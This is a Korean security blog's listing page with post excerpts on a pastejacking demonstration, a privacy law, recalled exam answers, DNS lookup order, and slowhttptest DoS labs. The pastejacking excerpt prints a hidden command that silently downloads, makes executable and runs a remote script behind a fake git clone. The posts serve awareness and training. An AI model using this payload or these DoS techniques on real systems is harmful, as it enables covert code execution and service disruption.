보안 & 해킹/정보 보안(16)
-
[해킹] 모르면 당한다 2탄. 복사, 붙여넣기만 해도 악성코드에 감염되는 Pastejacking!
/var/www/html/harmless 코드입니다. 사실 많이 해롭습니다. git clone /dev/null; clear; wget http://192.168.10.21/badcode.py -O /tmp/badcode.py &>/dev/null && chmod +x /tmp/badcode.py && /tmp/badcode.py & disown && clear git clone https://github.com/LionSec/katoolin.git /var/www/badcode.py 는 개인에 맞게 커스터마이징하여 만든 코드이기 때문에 새로 직접 작성하셔야 합니다.
2017.09.18 -
정보통신망 이용촉진 및 정보보호 등에 관한 법률(개인정보)
[시행 2017.3.23.] [법률 제14080호, 2016.3.22., 일부개정] 국문 다운로드 받기https://www.i-privacy.kr/jsp/user4/intro/law2.jsp
2017.06.03 -
정보보안기사 실기 9회 기출 복원
시험 보시느라 수고하셨습니다. 정답은 굵은 글씨로 표시했습니다. 잘못된 내용은 댓글로 알려주세요. 1. 맥, 리눅스, 유닉스,윈도우등 운영체제 별로 디렉터리 경로는 다르지만 DNS의 정보를 담고 있는 파일이며, 윈도우7이상 버전에서는 관리자 외에 수정이 불가능 한 파일의 이름은 무엇인가? - hosts 2. smurf 문제, 공격자가 희생자의 IP 로 위조하여 ICMP (A)Echo request 를 Broadcast 한다.희생자들은 (B)Echo reply 한다. (C) Broadcast 방법 3. (A)스택 영역에 할당된 버퍼의 크기를 초과하는 데이터나 실행가능 코드를 넣어 특정 변수나 복귀주소를 변경하여 임의의 코드를 실행하는 것이다. (B)힙 영역에서 버퍼를 초과 4. trustwave 사의 아파..
2017.05.27 -
윈도우와 리눅스에서의 DNS 질의 과정 및 우선순위 총정리
윈도우와 리눅스시스템에서 DNS 질의 과정과 우선순위를 총정리해봤습니다.빠트리거나 틀린 내용이 있으면 알려주세요. 인터넷 어딜 찾아봐도 한방에 정리된게 없네요.... 순서의 기준은 'spoofing등의 비정상적인 행위를 제외하고 패키지 설치, 설정 수정, 추가서버 등을 설치하여 질의 순서를 설정할 수 있다'는 기준입니다. 숫자가 커질수록 나중에 탐색하고 동작하는 순위가 밀립니다. DNS 질의 과정중 단 한부분이라도 해킹이나 수정된다면 파밍에 당할 수 있음을 생각하며... 윈도우에서의 DNS 질의 과정과 우선순위 1. DNS cache에 질의. - 해당 dns cache는 ipconfig /displaydns 명령어로 볼 수 있음. 주로 자동으로 캐시가 생성됨. 2. C:\windows\system32\d..
2017.05.01 -
'slowhttptest'를 이용한 HTTP_SlowRead 공격
Slowhttptest를 이용한 DoS 공격 모음 1. 'slowhttptest'를 이용한 HTTP GET 플러딩 공격(a.k.a slowloris)http://whackur.tistory.com/34 2. 'slowhttptest'를 이용한 HTTP_ Slowbody 공격 (a.k.a RUDY)http://whackur.tistory.com/35 3. 'slowhttptest'를 이용한 HTTP_SlowRead 공격http://whackur.tistory.com/37 1. 목적 -HTTP Slow Read 공격 -HTTP Slow Read 공격 기법을 이용한 DoS공격 실습 2. 이해 http://cafe.naver.com/kalilinux/396 을 먼저 읽어보자. 공격자는 TCP 세그먼트 헤더 중 ..
2017.03.21 -
'slowhttptest'를 이용한 HTTP_ Slowbody 공격 (a.k.a RUDY)
Slowhttptest를 이용한 DoS 공격 모음 1. 'slowhttptest'를 이용한 HTTP GET 플러딩 공격(a.k.a slowloris)http://whackur.tistory.com/34 2. 'slowhttptest'를 이용한 HTTP_ Slowbody 공격 (a.k.a RUDY)http://whackur.tistory.com/35 3. 'slowhttptest'를 이용한 HTTP_SlowRead 공격http://whackur.tistory.com/37 1. 목적 - HTTP Slow POST공격에 대해 이해한다. - RUDY 공격을 실습해본다. - 패킷을 보고 분석해본다. - 대응방법을 알아본다. 2. 이해 HTTP 플러딩 공격의 원리 참조 - http://cafe.naver.com/k..
2017.03.12